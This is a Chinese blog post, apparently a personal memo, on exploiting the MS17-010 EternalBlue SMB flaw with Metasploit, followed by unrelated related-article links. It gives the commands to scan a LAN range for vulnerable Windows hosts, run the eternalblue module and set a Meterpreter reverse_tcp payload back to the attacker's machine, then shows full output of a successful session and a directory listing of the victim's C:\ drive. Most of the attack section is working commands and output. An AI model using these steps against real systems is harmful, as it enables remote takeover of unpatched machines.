exploit-db : https://www.exploit-db.com/exploits/42315/

该漏洞的影响版本很广泛:Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)

具体请查看公告:Microsoft 安全公告 MS17-010 - 严重

下面简单记录局域网内,漏洞的利用过程,以备忘。

1、更新Metasploit

Metasploit里已经集成了该漏洞利用脚本,可能使用之前需要更新一下。

root@kali:~# apt update; apt install metasploit-framework

2、查找smb_ms17_010脚本位置

msf > search ms17-010

[!] Module database cache not built yet, using slow search

Matching Modules

================

   Name                                      Disclosure Date  Rank     Description

   ----                                      ---------------  ----     -----------

   auxiliary/scanner/smb/smb_ms17_010                         normal   MS17-010 SMB RCE Detection

   exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

3、扫描检测

msf > use auxiliary/scanner/smb/smb_ms17_010

msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   RHOSTS                      yes       The target address range or CIDR identifier

   RPORT      445              yes       The SMB service port (TCP)

   SMBDomain  .                no        The Windows domain to use for authentication

   SMBPass                     no        The password for the specified username

   SMBUser                     no        The username to authenticate as

   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.1-254

rhosts => 192.168.1.1-254

msf auxiliary(smb_ms17_010) > exploit

[+] 192.168.1.15:445      - Host is likely VULNERABLE to MS17-010!  (Windows 7 Professional 7601 Service Pack 1)

[+] 192.168.1.16:445      - Host is likely VULNERABLE to MS17-010!  (Windows 7 Professional 7601 Service Pack 1)

后面的就不再展示了,上面的话还可以设置扫描线程数THREADS, 以加快扫描速度。

除了上面可以检测网段之外,也可以针对单个ip进行检测。以192.168.1.16:445为例:

msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.16

rhosts => 192.168.1.16

msf auxiliary(smb_ms17_010) > exploit

[+] 192.168.1.16:445      - Host is likely VULNERABLE to MS17-010!  (Windows 7 Professional 7601 Service Pack 1)

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

4、漏洞利用getshell

从上面我们已经找到存在MS17-010漏洞的局域网主机192.168.1.16, 下面可以开始利用了。

msf auxiliary(smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description

   ----                ---------------  --------  -----------

   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.

   GroomDelta          5                yes       The amount to increase the groom count by per try.

   MaxExploitAttempts  3                yes       The number of times to retry the exploit.

   ProcessName         spoolsv.exe      yes       Process to inject payload into.

   RHOST                                yes       The target address

   RPORT               445              yes       The target port (TCP)

   SMBDomain           .                no        (Optional) The Windows domain to use for authentication

   SMBPass                              no        (Optional) The password for the specified username

   SMBUser                              no        (Optional) The username to authenticate as

   VerifyArch          true             yes       Check if remote architecture matches exploit Target.

   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name

   --  ----

   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.16    【靶机】

rhost => 192.168.1.16

msf exploit(ms17_010_eternalblue) > exploit

本地攻击机的ip是192.168.1.115

5、漏洞利用meterpreter

这里就直接给出利用过程了:

msf > use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description

   ----                ---------------  --------  -----------

   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.

   GroomDelta          5                yes       The amount to increase the groom count by per try.

   MaxExploitAttempts  3                yes       The number of times to retry the exploit.

   ProcessName         spoolsv.exe      yes       Process to inject payload into.

   RHOST                                yes       The target address

   RPORT               445              yes       The target port (TCP)

   SMBDomain           .                no        (Optional) The Windows domain to use for authentication

   SMBPass                              no        (Optional) The password for the specified username

   SMBUser                              no        (Optional) The username to authenticate as

   VerifyArch          true             yes       Check if remote architecture matches exploit Target.

   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name

   --  ----

   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp      【反弹shell】

payload => windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.103                     【漏洞主机

rhost => 192.168.1.103

msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.115                    【监听的主机】

lhost => 192.168.1.115

msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.115:4444

[*] 192.168.1.103:445 - Connecting to target for exploitation.

[+] 192.168.1.103:445 - Connection established for exploitation.

[+] 192.168.1.103:445 - Target OS selected valid for OS indicated by SMB reply

[*] 192.168.1.103:445 - CORE raw buffer dump (42 bytes)

[*] 192.168.1.103:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes

[*] 192.168.1.103:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv

[*] 192.168.1.103:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1

[+] 192.168.1.103:445 - Target arch selected valid for arch indicated by DCE/RPC reply

[*] 192.168.1.103:445 - Trying exploit with 12 Groom Allocations.

[*] 192.168.1.103:445 - Sending all but last fragment of exploit packet

[*] 192.168.1.103:445 - Starting non-paged pool grooming

[+] 192.168.1.103:445 - Sending SMBv2 buffers

[+] 192.168.1.103:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.1.103:445 - Sending final SMBv2 buffers.

[*] 192.168.1.103:445 - Sending last fragment of exploit packet!

[*] 192.168.1.103:445 - Receiving response from exploit packet

[+] 192.168.1.103:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

[*] 192.168.1.103:445 - Sending egg to corrupted connection.

[*] 192.168.1.103:445 - Triggering free of corrupted buffer.

[*] Sending stage (1188415 bytes) to 192.168.1.103

[*] Meterpreter session 1 opened (192.168.1.115:4444 -> 192.168.1.103:49169) at 2017-08-15 04:50:12 -0400

[+] 192.168.1.103:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.1.103:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.1.103:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > dir C:\

Listing: C:\

============

Mode             Size   Type  Last modified              Name

----             ----   ----  -------------              ----

40777/rwxrwxrwx  0      dir   2017-07-18 05:44:00 -0400  $Recycle.Bin

40777/rwxrwxrwx  0      dir   2017-07-25 10:54:59 -0400  360Downloads

40777/rwxrwxrwx  0      dir   2009-07-14 01:08:56 -0400  Documents and Settings

40777/rwxrwxrwx  0      dir   2009-07-13 23:20:08 -0400  PerfLogs

40555/r-xr-xr-x  4096   dir   2017-07-18 06:41:07 -0400  Program Files

40555/r-xr-xr-x  4096   dir   2017-07-25 10:52:48 -0400  Program Files (x86)

40777/rwxrwxrwx  4096   dir   2017-08-14 22:57:23 -0400  ProgramData

40777/rwxrwxrwx  0      dir   2017-07-18 05:43:47 -0400  Recovery

40777/rwxrwxrwx  4096   dir   2017-07-25 08:41:04 -0400  System Volume Information

40555/r-xr-xr-x  4096   dir   2017-07-18 05:43:52 -0400  Users

40777/rwxrwxrwx  16384  dir   2017-07-25 07:54:37 -0400  Windows

0000/---------   0      fif   1969-12-31 19:00:00 -0500  pagefile.sys

40777/rwxrwxrwx  0      dir   2017-07-18 05:49:23 -0400  share

从上面可以看到我们已经拿到一个meterpreter ... 

Github

另外附上github上找到的一个脚本,可以很方便的改成一个批量脚本:

https://github.com/pythonone/MS17-010/blob/master/scanners/smb_ms17_010.py

好了,到此结束,欢迎跟我留言交流。

SMB MS17-010 利用(CVE-2017-0144 )的更多相关文章

  1. Defense:SMB协议漏洞利用与控制CVE-2017-7494("永恒之蓝")攻防实验

    漏洞描述 1. 服务器打开了文件/打印机共享端口445,让其能够在公网上访问 2. 共享文件拥有写入权限 3. 恶意攻击者需猜解Samba服务端共享目录的物理路径 Samba是在Linux和UNIX系 ...

  2. NSA Fuzzbunch分析与利用案例

    Shadow Brokers泄露出一份震惊世界的机密文档,其中包含了多个 Windows 远程漏洞利用工具.本文主要介绍了其中一款工具Fuzzbunch的分析与利用案例 1 整体目录介绍 解压EQGR ...

  3. VS 2017 开发安卓环境搭建 问题总结

    VS 2017可以开发安卓啦,之前一直想尝试开发安卓,但是由于时间忙, Java只学了个基础,不如C#熟练所以一直没有机会接触安卓开发.既然需要利用VS2017开发安卓,那么第一步就是了解VS2017 ...

  4. Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)

    Struts2漏洞利用工具下载(已更新V1.8版) 2017-03-21:增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过部 ...

  5. MSF里MS17_010利用模块笔记

    1.   auxiliary/scanner/smb/smb_ms17_010      //扫描检测漏洞辅助模块 扫描结果这里可以看到 2,3,4这几台主机存在此漏洞! 2.     auxilia ...

  6. 微软SMB 3.0文件共享协议新特性介绍

    SMB(*nix平台和Win NT4.0又称CIFS)协议是Windows平台标准文件共享协议.Linux平台通过samba来支持.SMB最新版本v3.0,在v2.0基础上针对WAN和分布式有改进.详 ...

  7. 23.通过MS17_010来学习msf对渗透的利用

    Metersploit 集成了渗透阶段的全部利用,从漏洞探测,到漏洞利用,最后到后渗透阶段.本次博客主要抛砖引玉,通过对MS17_010漏洞的复现,来学习Metasploit. 漏洞环境: 靶机:wi ...

  8. MSF系列--MS17_010利用模块笔记

    1.   auxiliary/scanner/smb/smb_ms17_010      //扫描检测漏洞辅助模块 扫描结果这里可以看到 2,3,4这几台主机存在此漏洞! 2.     auxilia ...

  9. 【渗透实战】记一次艰难的内网漫游第四期_蹭我WIFI?看我如何利用组合拳日进蹭网者内网

    /文章作者:Kali_MG1937 CSDN博客ID:ALDYS4 QQ:3496925334/ 内网漫游系列第三期:[渗透实战]记一次艰难的内网漫游第三期_我是如何利用APT攻击拿到内网最高权限的 ...

  10. Metasploit(msf)利用ms17_010(永恒之蓝)出现Encoding::UndefinedConversionError问题

    Metasploit利用ms17_010(永恒之蓝) 利用流程 先确保目标靶机和kali处于同一网段,可以互相Ping通 目标靶机防火墙关闭,开启了445端口 输入search ms17_010 搜索 ...

随机推荐

  1. Oracle判断字段中是否包含中文(若有,取出该中文的方法)

    一.问题说明 在处理数据的时候,需要判断某个字段字符串中是否有中文,若有则取出中文. 二.解决办法 首先如何判断某个字段字符串中是否有中文.这里介绍三种方法: 1.采用ASCIISTR函数 说明:AS ...

  2. Sass & Scss & CSS3

    Sass & Scss & CSS3 Sass & Scss @mixin & @include & @import & variable https: ...

  3. hbase windows安装

    下载目前最新版本 http://mirrors.hust.edu.cn/apache/hbase/stable/ 最新版本 hbase-1.2.6 1. 解压到D:\software\hbase-1. ...

  4. 【BZOJ3203】保护出题人(动态规划,斜率优化)

    [BZOJ3203]保护出题人(动态规划,斜率优化) 题面 BZOJ 洛谷 题解 在最优情况下,肯定是存在某只僵尸在到达重点的那一瞬间将其打死 我们现在知道了每只僵尸到达终点的时间,因为僵尸要依次打死 ...

  5. 【BZOJ3672】【NOI2014】购票(线段树,斜率优化,动态规划)

    [BZOJ3672][NOI2014]购票(线段树,斜率优化,动态规划) 题解 首先考虑\(dp\)的方程,设\(f[i]\)表示\(i\)的最优值 很明显的转移\(f[i]=min(f[j]+(de ...

  6. 20135239 益西拉姆 linux内核分析 使用库函数API和C代码中嵌入汇编代码两种方式使用同一个系统调用

    https://drive.wps.cn/preview#l/759e32d65654419cb765da932cdf5cdc 本次直接在wps上写的,因为不能连同图片一起粘贴过来,一个一个粘比较费时 ...

  7. Python3 字典 get() 方法

     Python3 字典 描述 Python 字典 get() 函数返回指定键的值,如果值不在字典中返回默认值. 语法 get()方法语法: dict.get(key, default=None) 参数 ...

  8. Windows服务器下用IIS Rewrite组件为IIS设置伪静态方法

      1.将下载的IIS Rewrite 组件解压,放到适当的目录(如 C:Rewrite)下,IIS Rewrite 组件下载 http://www.helicontech.com/download- ...

  9. 洛谷P1012 拼数

    题目描述 设有n个正整数(n≤20),将它们联接成一排,组成一个最大的多位整数. 例如:n=3时,3个整数13,312,343联接成的最大整数为:34331213 又如:n=4时,4个整数7,13,4 ...

  10. Qt ------ 主事件循环与 QEventLoop

    1.事件循环一般用exec()函数开启.QApplicaion::exec().QMessageBox::exec()都是事件循环.其中前者又被称为主事件循环. 事件循环首先是一个无限“循环”,程序在 ...